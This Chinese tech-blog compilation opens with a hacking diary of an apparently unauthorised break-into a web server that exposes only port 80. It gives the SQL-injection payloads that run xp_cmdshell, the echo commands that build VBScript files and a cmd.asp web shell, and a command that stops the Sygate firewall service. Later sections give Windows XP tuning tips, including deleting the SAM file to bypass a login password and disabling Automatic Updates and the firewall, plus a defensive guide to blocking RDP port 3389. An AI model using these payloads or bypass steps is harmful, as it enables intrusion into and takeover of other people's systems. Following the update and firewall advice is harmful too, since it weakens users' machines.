MaxGO Inside
MaxGO Inside
文章
文件Regsvr32用法及情况介绍
来吧,朋友们,让我们的Windows2003 拒绝海洋顶端并支持FSO
只开80端口主机的入侵思路
安全设置:不说啦太变态了竟然只允许80进
扫描:先用x-scan2.3扫端口晕只开80,然后又扫了一遍
唉还是一样的结果,看来管理员也不算笨啊!
检查系统洞洞:先ping了一下竟然ping不通,不过有刚才的扫描结果就很明
白了应是iis5再加上网页上明显用的asp这样的主机当然是win2k不用
说咯.
分析:唉也没什么可以分析咯只能从80入手,看看上面都有些什么东东
有一个查询系统输入单引号试试,返回
错误类型:
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
/mingce/student1.asp, 第 30 行
看来运气也不算太坏嘛........应该有sql注入的毛病.........
为了进一步确认试试运气输http://x.x.x.x//mingce/student1.asp.BAK
的确可以正确提交哟返回如下:
if request.form("xsxm")="" and request.form("xsxh")="" then
Set Conn=Server.CreateObject("ADODB.Connection")
Conn.Open "Driver={sql server};Server=localhost;Database=xxxx;UID=sa;PWD="&application("mm_xxx")
比较长只是上面三行最重要了:我们可以看出ASP后台程序没用对用户提交进行任何的
过滤,同时数据库用的ADODB.Connection对象(如果是ADODB.Command就算没有过滤
特殊符号也不行的),当然也可以看出数据库使用的sa来连接的!
(Tip:其实就算我们看不到ASP的源代码我们也可以试试xp_cmdshell 'iisreset /reboot'
或是xp_cmdshell 'ping 你.的.I.P',如果第一个命令能执行成功那么在半分钟之内远程
系统会重启一次的,第二个命令你自已的机子的防火墙通常会提示来至x.x.x.x的主机向你
发送ICMP数据,不过对于这种禁止任何数据出的主机第二个命令可能也不行哟)
好了通过上面的分析我们可以做什么呢:
通过在web页以管理员的身份来执行系统命令(不过没有回显的)
如果是一般的系统主机简单了xp_cmdshell 'net user .....'我就不写了
但是我们现在环境是系统只开了80端口,就算我们能加ADMIN用户也没用三
以前通常只要开个139/445/135就可以远程管理了不过现在不行.
我的思路:
1)找到web目录的路径
2)写入一个简单的cmd.asp用来找到防火墙的具体名字
3)通过xp_cmdshell来关闭防火墙服务
具体实现:
第一步明显是最难的咯
我本来打算用adminScripts里面的建web站的方式建一个我自已的可执行目录的
结果不行哟.然后就想到了使用adsutil.vbs程序我是这样执行的
a';exec master..xp_cmdshell 'cmd /c cscript c:\inetpub\adminscrips\adsutil.vbs enum w3svc/1/root>a.txt';--
是不是很长啦通过它我们可以把iis里面第一个虚拟web站点的设置情况(当然包括它所在的实际目录咯)导入到a.txt中
对于a.txt的实际位置默认当然是c:\winnt\system32,其实这都不是问题,不过遇到管理员把adsutil.vbs删了或是放到别
的地方我们就没办法了(不可能自已用echo 命令写一个吧)
第二步:用echo命令写下面的代码到c:\中,很多吗也不算吧
.....xp_cmdshell 'echo set fso1=createobject("scripting.filesystemobject")>c:\read.vbs';--
.....xp_cmdshell 'echo Set WshShell = Wscript.CreateObject("Wscript.Shell")>>c:\read.vbs';--
.....
-------------------read.vbs---------------------------------
set fso1=createobject("Scripting.filesystemobject")
Set WshShell = WScript.CreateObject("WScript.Shell")
spa=WshShell.Environment("process")("windir")
set fil =fso1.opentextfile(spa & "\system32\aa.txt")
do while not fil.atendofstream
nr=fil.readline
if left(nr,4)="Path" then
pa=mid(nr,instr(nr,")")+3,len(nr)-instr(nr,")")-3)
exit do
end if
loop
set fil1 =fso1.opentextfile(pa&"\dd.asp",2,true)
fil1.writeline ""
---------------cut here--------------------------------------
第三步:当然就是执行read.vbs三,这样我们可以把aa.txt中的内容读出来找到web站点的实际路径
然后写一个叫dd.asp的文件在web站的根目录中,能否成功试试就知道咯
执行http://x.x.x.x/dd.asp
返回:\xxx
看来我运气就是不错的哈(其实有个问题是我们找的第一个web站点可能并不能通过x.x.x.x来仿问)
第四步:就是用echo命令生成cmd.asp,唉也不算长嘛也就20行而已
其实在有的网站上(通常是虚拟主机)cmd.asp是不能执行的,不过这台主机是独立的服务器
所以管理员就没有禁止了
--------------------------cmd.asp------------------------------
-----------------------cut here--------------------------------
第五步:执行cmd.asp三,这样我们可以找到系统上到底安的是什么防火墙,找啊找没多久我找到了
e:\progra~1\sygate\spf,就是它不用说了嘛sygate personal firewall pro(具体版本在cmd.asp
里执行echo readme.txt不就明白了)
第六步:关闭sygate的防火墙
a';exec master..xp_cmdshell 'net stop smcservice';--
(smcservice是sygate防火墙的服务名)
第七步:看一看成功了吗?用x-scan扫,现在就对了三53,139,135,1433......都出来了
第八步:添加系统管理员打开telnet............
唉打了半天反正就是这样了...其实我想应该还有好的办法只是我没想到吧.......
比如说用echo命令写一个ftp脚本来下载一个httptunel之类的程序然后再打开telnet
....当然你也可能想得到更简单的办法就是猜web站点的实际目录......
XP系统优化超简单实用版
1。关闭计算机时自动结束任务:
在关机的时候,有时会弹出讨厌的对话框,提醒某个程序仍在运行,是否结束任务。其实完全可以通过一点点修改让Windows自动结束这些仍在运行的程序。在注册表中打开HKEY_CURRENT_USER\Control Panel\Desktop 目录,把里面的AugoEndTasks键值改为1
2。INTERNET时间同步
如果你使用时间同步~那么你的计算机每到一定时间就会和Internet上的时间服务器进行核对 浪费一些内存 建议关掉他因为你的计算机一开始调对时间的话几乎不错出现时间偏差 关闭方法
开始→控制面版→日期时间语言和区域选项→日期和时间→Internet时间
关闭同步就OK了~
3。关掉快速切换用户功能
WIN XP的一个引人注目的功能叫做"快速切换"这个功能为许多用户在同一时间使用电脑提供了可能但是这项功能也要消耗一定量的内存如果你的内存是64M WIN XP安装的时候就会自动禁止这项功能~对于128M的用户也会有点吃不消所以建议还是关掉吧~ 方法 控制面板→用户帐户→更改用户登陆或注销方式 去掉 使用快速用户切换 就可以了~
4。加快菜单显示速度
打开注册表编辑器,找到 HKEY_CURRENT_USER\Control Panel\Desktop,将其下的 MenuShowDelay 项(400)改为:0,你的菜单将会出乎意料地快
5。删除系统备份
XP系统会自动记录一些硬件配置和注册表关键信息其实我们完全不需要这样当系统崩溃的时候我们完全可以用事先备份好多GHOST来恢复系统
删除系统文件备份 开始→运行→输入 sfc.exe/purgecache 回车(节约300MB+呢~)
同上是XP系统备份的驱动程序删除驱动备份windows\drivercache\i386目录下的Driver.cab文件(73mb)
系统自动备份的*.dll文件 我们一般可以删除掉他删掉\WINDOWS\system32\dllcache下文件(减去200--300mb)(这是备用的dll文件,只要你拷贝了安装文件,完全可以这样做。既然这样删你没话说)
6。删除WINDOWS XP帮助文件
XP系统附带了很详细删除帮助文件,帮助你更好的了解XP系统的各种新的功能和配置使你能更好的(如果你对WINDOWS还不了解那请不要删除帮助文件)
7。系统变量设置
把我的文档、IE的临时文件夹都转到其他盘(分区)。(同时对系统的速度,和硬盘都有好处)
如果使用的是双系统,最好把两个系统的IE临时文件都放在同一个文件夹,这样既加快速度有节省空间)
把虚拟内存也转到其他盘。(就是将这些东西和平时临时下载文件放在一个不大的分区里,这样也方便整理硬盘)
将应用软件装在其他盘(这对重装系统也有好处,可以省很多事)。
8。删除多余输入法和多余语言种类
删除\windows\ime下不用的输入法!(日文,韩文,繁体中文输入法,84.5MB)(到底哪个是哪个自己研究一下吧!有时候也要自己动动脑子的,锻炼一下吧!)
删除不需要的输入法
鼠标右击桌面右下角的输入法图标,可以删去不要的输入法,这谁都知道,可你看看硬盘空
间并没有减少,这是为什么呢?原来Windows并没有删除掉那些输入法的相关文件,还得我们
自己手动删除。以下是Windows自带的输入法的相关文件列表。
全拼:Winpy.ime、Winpy.mb、Winpy.hlp、Winpy.cnt。
双拼:Winsp.ime、Winsp.mb、Winsp.hlp、Winsp.cnt。
微拼:Pintllime.dll、Pintlgab.imd、Pintlgai.imd、Pintlgb.imd、Pintlgd.imd、
Pintlgdx.imd、Pintlgie.imd、Pintlgnt.cnt、Pintlgnt.hlp、Pintlgnt.i96、
Pintlgnt.ime、Pintlgrb.imd、Pintlgri.imd、Pintlgs.imd、Pintlgsi.imd、Pintlgsx.imd
、Pintlgu.imd、Pintlguc.imd、Pintlphr.exe。
智能ABC:Winabc.cwd、Abcsda.dll、Abcwin.exe、Winabc.ime、Winabc.ovl、tmmr.rem、
user.rem、Winabc.hlp、Winabc.cnt。
郑码:Winzm.ime、Winzm.mb、Winzm.hlp、Winzm.cnt。
内码输入法:Wingb.mb、Wingb.hlp、Wingb.cnt。
表形码:Winbx.mb,Winbx.ime,Winbx.hlp,Winbx.cnt
9。关掉多余系统报告
如果你的系统崩溃时发现你的硬盘使劲儿的响,那是因为windowsXP正在写DUMP文件呢,对我们来说根本没用你还能把这一错误发给微软吗?~
完全没必要如果关闭呢~点机 我的电脑→属性→高级→启动和故障恢复→设置→
系统失败 中只选自动重起 不选写入调试信息
10。删除共享文档:
默认情况下,在Windows XP中打开我的电脑,会看到在硬盘图标上方有一些文件夹。这些就是"共享文件夹",这里有每一个用来户共享文件所用的文件夹。这些文件夹特别烦人,毫无必要。我们可以让这些文件夹在我的电脑中消失:打开注册表编辑器,把HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MyComputer\NameSpace\DelegateFolders下的
{59031a47-3f72-44a7-89c5-5595fe6b30ee}删掉,下次打开我的电脑,这些烦人的文件夹就不复存在了~
11。缩短程序响应等待时间
打开注册表编辑器
找到 HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control,将 WaitToKillServiceTimeout 设为:1000或更小(原设定值:20000)。
找到 HKEY_CURRENT_USER\Control Panel\Desktop 键,将右边窗口的 WaitToKillAppTimeout 改为 1000(原设定值:20000),即关闭程序时仅等待1秒。将 HungAppTimeout 值改为:200(原设定值:5000),表示程序出错时等待0.5秒
12。系统加速
手动识别cpu的二级缓存,以改善cpu的性能:
找到"[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\SecondLevelDataCache]";修改其十进制:
AMD Duron: 64(kb);
CeleronA/celeron2:128;
PII/PIII E(EB)/P4/AMD K6-3/AMD THUNDERBird/Cyrix III:256;
AMD K6-2/PII/PIII katmai/AMD Athlon:512;
PII Xeon/PIII Xeon:1024;
修改磁盘缓存以加速xp,磁盘缓存对xp运行起着至关重要的作用,但是默认的I/O页面文件比较保守。
去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\IoPageLockLimit];
根据你的内存修改其十六进制值:
64M: 1000;
128M: 4000;
256M: 10000;
512M或更大: 40000.
预读设置以提高速度,xp使用预读设置这一新技术,以提高系统速度。
去[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters\EnablePrefetcher];
设置数值0,1,2,3。0-Disable,1-预读应用程序,2-启动预读,3-前两者皆预读("3",推荐使用)。当然如果你图的就是个快你就选 0
13。让系统自动关闭停止回应的程式。
打开注册表HKEY_CURRENT_USER\ControlPanel\Desktop键,将AutoEndTasks值设为1。(原设定值:0)
MsConfig。大多数朋友都应该熟识MsConfig了,这是一个系统内置的Windows设置工具。
点击开始菜单,选择"运行",然后在录入框中敲入"msconfig"回车。我们要动手脚的是(启动)选项卡,点击它,这个选项卡中显示了Windows启动时运行的所有程序。这里没有一个程序对Windows来说是生死悠关的,所以放心大胆地把不要的去掉。把部分勾勾去掉之后,Windows启动会快些,同时空闲的系统资源也会多出一些。
14。系统稳定优化设置。
关掉调试器Dr.Watson;
Dr.Watson是自带的系统维护工具,它会在程序加载失败或崩溃时显示。运行drwtsn32,把除了"转储全部线程上下文"之外的全都去掉。否则一旦有程序出错,硬盘会响很久,而且会占用很多空间。如果你以前遇到过这种情况,请查找user.dmp文件并删掉,可能会省掉几十MB的空间。
15。系统修复维护
关闭"系统还原"从WIN2000开始WIN就不附带DOS操作系统了而是系统还原方式当然这种方式很简单适合对DOS不太了解的用户使用 但是确浪费了大量的磁盘空间和内存空间。关闭系统还原方法采用鼠标右健单击桌面上的"我的电脑",选择"属性",找到"系统还原",如果你会利用DOS来修复系统的话这样可以节省好多空间。
关闭"休眠支持":因为休眠功能占的硬碟空间蛮大的,所以关闭比较好,
控制台-->电源选项-->休眠(不要打勾)关掉休眠可以节约一些硬盘空间和内存
16。优化程序运行
程序运行有他们各自的优先次序,所有程序都要占用处理器资源,处理器处理任务有一个先后次序,一般的计算机中有31个优先等级,系统的内核占据了最高的一些等级,这样就能保证系统的稳定,而普通的应用程序一般在比较后面的等级。在普通应用程序中间也有优先次序,他们本来在处理器面前是人人平等的,但还是有些细微的差别,前台的程序(当前正在使用)的优先级要比后台的程序高。你可以自己调节应用程序的优先级,打开任务管理器,点到"进程"选项卡,选一个应用程序的进程,点击右键,会弹出一个快捷菜单,选择"设置优先级",这里有6个等级:实时,高,高与标准,标准,低于标准,低。你可以让你的程序强行调度到更高或更低(自然为别的程序腾出了资源)的等级。如果你不知道某个应用程序的具体进程,可以如下操作:点到"应用程序"选项卡,右键点中一个任务,选择"转到进程",就会转到该程序的进程,这样你就找到了该程序的进程了。
17。拒绝分组相似任务栏
虽然Windows XP "分组相似任务栏按钮"设置虽然可以让你的任务栏少开窗口,保持干净,但对于一些需要打开同类多个窗口的工作非常不便。如你是经常用QQ这样的通讯软件和人在线聊天的话,如果有两个以上的好友同时和你交谈,你马上会感到XP这种默认设置造成的不便 D D每次你想切换交谈对象的时候,要先点击组,然后弹出的菜单里再选要交谈的好友,而且每个好友在组里显示的都是一样的图标,谈话对象多的时候,你可能要一个个的点击来看到底刚才是谁回复了话,在等着你反应,而且选错了一个,又得从组开始选,很麻烦。显然地,这样不如原来的开出几个窗口,在任务栏里的各个小窗口点击一次就可进行开始聊天。更改方法:点击"开始→控制面板→外观和主题→任务栏和‘开始'菜单",在弹出的窗口内,将"分组相似任务栏按钮"选项前面的钩去掉。
18。修改Windows XP的登录背景图案
面对长久不变的单调的登录图案,你可能日久生厌,我们可以通过注册表来把它换成自己喜欢的图案,步骤如下:打开注册表编辑器,找到HKEY_USERS\.DEFAULT\Control Panel\Desktop子键分支,双击wallpaper,键入你选择好的图片的路径,如:c:\Documents and Settings\My Documents\My Pictures\mypic.bmp,点击"确定",然后找到Tilewallpaper,双击它输入键值"1",重新启动系统即可看到效果。
19。让Win XP支持137 GB以上大硬盘
想要使用137 GB以上大硬盘,必须使用48位LBA模式。首先你的主板BIOS必须支持48Bit LBA,其次Win XP家用版和专业版必须安装SP1补丁。然后打开注册表,在如下路径"HKEY_LOCAL_MACHINE System CurrentControlSet Services Atapi Parameter"找到"EnableBigLba"选项,将其值由"0"改为"1"。如果该项不存在,可以自建"DWORD值"项目,同样设置.最后重新启动即可。
20。解决任务栏假死
"控制面板"->"区域和语言选项"->"语言"->"详细信息",在弹出的"设置窗口"中选择"首选项"的"语言栏",关闭"在桌面上显示语言栏",在第三项"在通知区域显示其他语言栏图标"复选框上打上勾。如果不需要手写识别、语音识别的话,也可以再勾选最后一项"关闭高级文字服务"。
21。每次启动时保持桌面设置不变
我们可以通过修改注册表来保护我们的桌面设置,无论做了什么样的修改,只要重新启动之后桌面就会恢复原样。步骤如下:打开注册表编辑器,找到HKEY_CURRENT_USERS\Software\Microsoft\Windows\CurrentVersion\Polices\Explorer子键分支,在它的下面找到NoSaveSettings,其类型为REG_SZ,将其键值改为"0",或者直接删除该键值项,重新启动系统使设置生效。
22。更改Windows XP序列号
在Windows XP安装完毕以后,可能由于某些原因你又想在已经安装完毕的Windows XP上更改序列号,该怎么办呢?使用激活向导可以满足你的要求。
注意:开始之前,建议你在修改之前作一个系统备份推荐使用GHOST,以免误操作引起不必要的麻烦。
点击"开始"→"运行",输入regedit后回车,打开注册表编辑器,定位到HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT\Current Version\WPAEvents,在右边右键单击OOBETimer,然后选择修改,至少修改一个字节,确定保存。
点击"开始"→"运行",输入%systemroot%\system32\oobe\msoobe.exe /a,选择通过电话激活以后点击"下一步",点击修改序列号,输入新的序列号以后选择"更新",如果退回到前一个画面,那么选择稍后激活,并重新启动,反复前面的步骤直到修改成功为止,重新激活。点击确定,安装SP1。
如果你安装SP1以后不能重新启动,那么启动的时候按F8,选择使用"最后一次正确的配置",然后重复以上流程。本方法适用于Windows XP Professional。
23。禁止脚本错误报告
当IE遇到页面中的脚本错误时,它会报告错误。除非你在调试自己的程序,否则即使知道了错误的详细信息,也没有任何办法来改正错误。所以对大多数用户来说,报告脚本错误是一个中看不中用的功能。禁止浏览器报告脚本错误的办法如下:
从IE的工具菜单选择"Internet选项"。 选择"高级"选项卡。向下滚动列表,找到"浏览"区域。 找到"禁止脚本调试",选中前面的检查框。
24。忘记登陆口令的解决办法
Windows XP对用户安全性的审核即是非常严格的,大家知道,Windows XP中对用户帐户的安全管理使用了安全帐号管理器(Security Account Manager,SAM)的机制,安全帐号管理器对帐号的管理是通过安全标识进行的,安全标识在帐号创建时就同时创建,一旦帐号被删除,安全标识也同时被删除。安全标识是唯一的,即使是相同的用户名,在每次创建时获得的安全标识都时完全不同的。因此,一旦某个帐号被删除,它的安全标识就不再存在了,即使用相同的用户名重建帐号,也会被赋予不同的安全标识,不会保留原来的权限。
安全账号管理器的具体表现就是%SystemRoot%\system32\config\sam文件。SAM文件是Windows NT/2000/XP的用户帐户数据库,所有用户的登录名及口令等相关信息都会保存在这个文件中。知道了这些我们的解决办法也产生了:在系统启动前,插入启动盘,进入C:\WINNT\System3\Config\,用ren命令将SAM文件改名,或用del命令将SAM文件删除,重启电脑即可。改名或删除SAM文件以后,试用Administrator登录,密码为空,成功了。
25。压缩文件夹
这是一个相当好的优化,Windows XP内置了对.ZIP文件的,我们可以把zip文件当成文件夹浏览。不过,系统要使用部分资源来实现 这一功能,因此禁用这一功能可以提升系统性能。实现方法非常简单,只需取消zipfldr.dll的注册就可以了,点击开始——运行,敲入: regsvr32 /u zipfldr.dll。然后回车即可。
26。关掉不必要的服务
单击"开始"→"设置"→"控制面板"。双击"管理工具"→"服务",打开后将看到服
务列表,有些服务已经启动,有些则没有。右键单击要配置的服务,然后单击"属性"。在
"常规"选项卡上选择"自动"、"手动"或"禁用",其中"自动"表示每次系统启动时
,WindowsXP都自动启动该服务;"手动"表示WindowsXP不会自动启动该服务,而是在你需
要该服务时手动启动该服务;而"禁用"则表示不允许启动该服务。在实际配置时,选择"
手动"或者"禁用"都可以实现关闭该服务的目的,推荐使用手动功能,这样你随时可以启
动一些临时需要的服务。有些服务是WindowsXP所必需的,不能关闭,否则将会造成系统崩溃
。至于各项服务
的功能,我们可以通过双击该服务或将鼠标悬停在该服务名上查看。具体服务的说明浅显,
大家看得懂,可以自己选择那些要那些不要。修改的方法是:选中禁用的服务,点右键,选"
属性">"停止",将"启动类型"设置为"手动"或"已禁用"。
以下为一些不常用的服务:
Alerter-错误警报器。禁用
AutomaticUpdates-windows自动更新,不影响手动更新。禁用
Clipbook-与局域网电脑共享粘贴/剪贴的内容。禁用
ErrorReportingService-错误报告器。禁用
FastUserSwitchingCompatibility-多用户快速切换服务,不如用注销了。禁用
HelpandSupport-帮助。手动
HumanInterfaceDeviceAccess-支持多媒体键盘等HID设备。手动
IMAPICD-BurningCOMService-有其他的刻录软件就不需要了。禁用
IndexingService-索引服务,用于快速查找文件,关闭也能查。手动
IPSECServices-安全方面的。手动
NetMeetingRemoteDesktopSharing-用Netmeeting实现电脑共享。禁用
NetworkDDE-禁用
NetworkDDEDSDM-禁用
PerformanceLogsandAlerts-记录机器运行状况而且定时写入日志或发警告。手动
PortableMediaSerialNumber-禁用
PrintSpooler-打印机服务,关掉就无法打印了,视情况而定。手动
RemoteDesktopHelpSessionManager-远程帮助服务,禁用
RemoteRegistry-远程注册表运行/修改。大漏洞,禁用
RoutingandRemoteAccess-路由服务。禁用
SecondaryLogon-给与administrator以外的用户分配指定操作权.手动
SecurityAccountsManager-像ProtectedStorage,IISAdmin才需要。手动
SmartCard-智能卡服务,我没用过。手动
SmartCardHelper-智能卡帮助,手动
SystemRestoreService-系统还原服务,自己决定。我选禁用
TCP/IPNetBIOSHelper-如果你的网络不用Netbios或WINS,就禁用
UninterruptiblePowerSupply-UPS用的吧。手动
UploadManager-用来实现服务器和客户端输送文件,简单文件传输不需要这个!手动
VolumeShadowCopy-同MSSoftwareShadowCopyProvider。手动
WebClient-不清楚,我用手动
windowsTime-网上时间校对。手动
WirelessZeroConfiguration-无线网络设置服务。手动
WMIPerformanceAdapter-不清楚。手动
winxp专业版的各标准服务简介
alerter-错误警报器。禁用
applicationlayergatewayservice-有些防火墙/网络共享软件需要。手动
applicationmanagement-用于设定,发布和删除软件服务。手动
automaticupdates-windows自动更新,不影响手动更新。禁用
backgroundintelligenttransferservice-后台智能传输。手动
clipbook-与局域网电脑共享粘贴/剪贴的内容。禁用
Com+Eventsystem -很多软件需要。自动
COM+Eventsystemapplication -和上面的差不多,但不是那么重要。手动
ComputerBrowser-用来浏览局域网的服务,但关了也不影响浏览!手动
CryptographicServices-windows更新时用的。手动
DHCPClient-局域网域用户和宽带adsl拨号可能需要。手动
Distributedlinktrackingclient-用于局域网更新连接信息。手动
DistributedTransactioncoordinator-并行处理使用,如果你不是服务器的话,就禁用
DNSClient-DNS解析服务。服务器用。手动
Errorreportingservice-错误报告器。禁用
EventLog-系统日志纪录服务,用于查找系统毛病.自动
Fastuserswitchingcompatibility-多用户快速切换服务,不如用注销了。禁用
helpandsupport-帮助。手动
Humaninterfacedeviceaccess-支持多媒体键盘等HID设备。手动
IMAPICD-burningCOMservice -有其他的刻录软件就不需要了。禁用
Indexingservice-索引服务,用于快速查找文件,关闭也能查。手动
InternetConnectionFirewall(ICF)-xp防火墙,没什么用。禁用
IPSECServices-安全方面的。手动
LogicalDiskmanager -磁盘管理服务。手动
LogicalDiskmanageradministrativeservice-同上。手动
messenger-局域网内利用netsend命令传递消息。禁用
MSsoftwareshadowcopyprovider-软件备份。禁用
NetLogon-登陆domain,如果局域网是工作组方式或是个人用户,请禁用
Netmeetingremotedesktopsharing-用Netmeeting实现电脑共享。禁用
NetworkConnections-上网/局域网要用的!自动
NetworkDDE 和NetworkDDEDSDM -禁用
NetworkLocationAwareness-如有网络共享或ICS/ICF可能需要.(服务器端)手动
NTLMSecuritysupportprovider-安全方面的。禁用
NVIDIADriverHelperservice-nvidia显卡帮助,禁用
Performancelogsandalerts-记录机器运行状况而且定时写入日志或发警告。手动
PlugandPlay-自动检测新装硬件。自动
Portablemediaserialnumber-禁用
PrintSpooler-打印机服务,关掉就无法打印了,视情况而定。手动
ProtectedStorage-储存本地和网上服务密码,包括填表时的"自动完成"等功能。自动
QoSRSVP-个人用户用不着。手动
Remoteaccessautoconnectionmanager-我是ADSL,设成了手动
Remotedesktophelpsessionmanager-远程帮助服务,禁用
RemoteProcedureCall(RPC)-系统核心服务!自动
RemoteProcedureCallLOCATOR-管理RFC数据库服务,手动
remoteregistry-远程注册表运行/修改。大漏洞,禁用
removablestorage -磁带备份用的。禁用
routingandremoteaccess-路由服务。禁用
secondarylogon-给与administrator以外的用户分配指定操作权.手动
securityaccountsmanager-像ProtectedStorage,IISAdmin才需要。手动
server-局域网文件/打印共享需要的。自动
shellhardwaredetection-不清楚,自动
smartcard-智能卡服务,我没用过。手动
smartcardhelper-智能卡帮助,手动
SSDPDiscoveryservice-没有什么硬件利用这个服务。禁用
systemeventnotification-记录用户登录/注销/重起/关机信息。视情况定。手动
systemrestoreservice-系统还原服务,自己决定。我选禁用
taskscheduler-windows计划任务。禁用
TCP/IPNetBIOShelper-如果你的网络不用Netbios或WINS,就禁用
Telephony-拨号服务,如果你的宽带不用拨号,那么关了它。
Telnet-大漏洞,这和dos中telnet命令没关系。禁用
terminalservices-实现远程登录本地电脑,快速用户切换和远程桌面功能需要。禁用
themes-关掉了就没有漂亮的界面了。自动
uninterruptiblepowersupply-UPS用的吧。手动
universalplugandplaydevicehost-同SSDPDiscoveryService。禁用
uploadmanager-用来实现服务器和客户端输送文件,简单文件传输不需要这个!手动
volumeshadowcopy-同MSSoftwareShadowCopyProvider。手动
webclient-不清楚,我用手动
WindowsAudio- 关了就没声音了!自动
WindowsInstaller-windows的MSI安装服务,手动
windowsimageacquisition(WIA)-扫描仪用的,但是大多数都不需要。手动
WindowsManagementInstrumentation-核心服务。自动
windowsmanagementinstrumentationdriverextensions-没上面的重要,手动
windowstime-网上时间校对。手动
wirelesszeroconfiguration-无线网络设置服务。手动
WMIperformanceadapter-不清楚。手动
Workstation-很多服务都依靠这个服务,支持联网和打印/文件共享的。自动
27。自动登陆
单击开始→运行,输入"rundll32 netplwiz.dll,UsersRunDll"(不带引号),然后在User Accounts中取消"Users must enter a user name and password to usethis computer",单击"OK",接着在弹出的对话框中输入你想自己登陆的用户名和密码即可。
28。快速关机或重启的快捷键(可定时)
在桌面点击鼠标右键,选择新建快捷方式,在弹出的向导中输入位置为:C:WINDOWSsystem32shutdown.exe -s -t 10(其中的-s可以改为-r,也就是重新启动,而-t 10表示延迟10秒,你可以根据自己的需要更改这个数字)。制作完这个快捷键后,按照上面的方法为它指定一个图标。这个快速关机或重启的技巧会显示一个比较漂亮的对话框提示关机(重启),而且你可以在后面加上"-c "我要关机啦!"",这样这句话会显示在对话框中,当然文字你可以随意写,但要注意不能超过127个字符
29。还有建议使用GHOST备份系统~
建议是XPlite进行WINDOWSXP瘦身把那些你认为没用的想删除又删不掉WINDOWS组文件~
原本WINDOWSXP大概需要两个GB 可是如果用我们所介绍的优化方法优化的话你会发现哇WINDOWS只省下1.2G左右拉~哈哈~
使用IP策略阻止3389非法访问
我们大家现在都已经认识到这一点,开始着手3389的安全防护,比如:给系统装上最新的SP,删除系统输入法帮助,更改默认的3389端口,将终端服务RDP协议绑定在需要连接的介面卡上等等方法,但这些也会有不足的地方,能否可以进一步的保证3389的安全性呢?回答是肯定的.我们可以使用2000的IP安全策略来加强3389的防护.
思路是这样:我们在主机过滤大部分远程连接本地3389端口的TCP请求,仅仅允许通过我们指定的授权IP连接(管理员所使用的工作站地址),下面我们来看看如何实现.(我第一次使用时,感觉挺复杂的,呵呵~ 我笨,但了解后就感觉好了,希望您第一次要耐着性子尝试一下,对以后在安全管理系统上会有帮助!)
首先,打开"管理工具"中的"本地安全策略",在"IP安全策略"选项上点击右键,如图1:
选择"创建IP安全策略",会弹出向导窗口,单击下一步,在弹出的窗口中,输入此策略的名称,比如这里我们键入"3389过滤"再单击下一步,以后全部默认下一步,其中有一个警告,单击"是"即可这样就完成新策略的添加.如图2:
点击确定后,回到图1界面,选择"管理IP筛选器操作",弹出窗口,如图3
我们先要建立一个筛选器,单击"添加",弹出窗口,在筛选器名称里填入"3389筛选器1",再单击旁边的"添加",会弹出向导窗口,单击"下一步",会出现源地址选项,(你可以按照自己的需要选择),在这里我们选择"任何IP地址",单击下一步,在目的地址中选择"我的IP地址",再单击下一步,选择IP协议,这里我们选择TCP,单击下一步,会出现端口选择,如图4:
4
我们设置从任何端口到本机的3389端口.单击下一步.就完成了筛选器的建立.如图5:
5
接着回到图3界面,单击"管理筛选器操作"页栏,单击"添加",会弹出筛选器操作向导,单击"下一步",取名为"阻止3389",单击下一步,
在选择操作页面中选择"阻止",单击"下一步",就完成了筛选器的建立.如图6:
6
好了! 我们建立了筛选器和筛选器操作,现在就要建立IP安全规则了.(***)在图1界面中,双击我们刚刚建立的"3389过滤"策略,弹出策略属性窗口,然后单击"添加"弹出向导,单击"下一步",一直单击下一步,其中一个选择"是",直到这里,如图7:
7
这时,我们要选择我们刚才建立的"3389筛选器1",然后再单击下一步.如图8:(大家注意到没有,傍边的"添加""编辑"等按钮,其实我们可以在此向导中就可以一次完成建立筛选器及筛选器操作等工作)图8
8
我们选择建立的"阻止3389"的操作,单击"下一步",就完成了安全规则的建立.
现在我们就已经有了一个基于在3389端口阻止所有IP连接的安全策略了.现在,你在图1的界面上,在"3389过滤"策略上单击右键,再单击"指派",这样,系统就开始应用安全策略了.所有连接3389的TCP请求都将被阻止.
现在所有的连接都被阻止了,管理员如何连接呢? 别急我们再来建立一个允许管理员登陆的策略.
我们回到图3的界面,重复建立筛选器的步骤,建立一个名为"3389筛选器2"的筛选器,别的设置和"3389筛选器1"的一样,只是在选择源地址时要选择"一个特定的IP地址",这里比如我的管理员工作站IP是192.168.0.2,如图9:
9
然后再重复建立筛选器操作的步骤,建立一个名为"允许3389"的操作,和上面不同的是在选择动作时使用"许可".
再回到上面的(***)的地方,重复建立规则的步骤,用"3389筛选器2"和"允许3389"建立一个新的规则,完成后在策略"3389过滤"属性中显示如下:如图10:
10
至此,我们已经完成了在3389端口上的IP策略!此时,只有来自192.168.0.2的IP地址将被许可连接,其他的IP地址通讯都将被阻塞.(IP策略需要指派后才可生效,不需要重起,在更改设置时也不用停止后再指派.指派相应的IP策略后,此IP策略名上有个小绿点)
**********************************************
关于动态IP连接的问题
对于拨号上网或动态IP地址的管理员,我想应该可以在允许连接源地址中选择"一个特定的子网"来实现.我没有环境,所以测试不了.只有猜了.见谅!
另外,是不是可以尝试使用一下第三方工具,如winrouter.设置它关掉任何对3389的连接,当管理员需要连接3389时,使用本地winrouter远程控制服务器winrouter打开对自己当前IP的允许连接,就可以上3389了.管理完毕后,再将3389关掉,也可以从一定程度上加强系统安全.
建立主动性网络安全体系
防火墙和其它反病毒类软件都是很好的安全产品,但是要让你的网络体系具有最高级别的安全等级,还需要你具有一定的主动性。
你是不是每天都会留意各种黑客攻击、病毒和蠕虫入侵等消息,不过当你看到这些消息时,也许你的系统已经受到攻击了。而现在,我要给你介绍一种更具主动性的网络安全模型,通过它,就算再出现什么新病毒,你也可以对企业的网络系统感到放心。
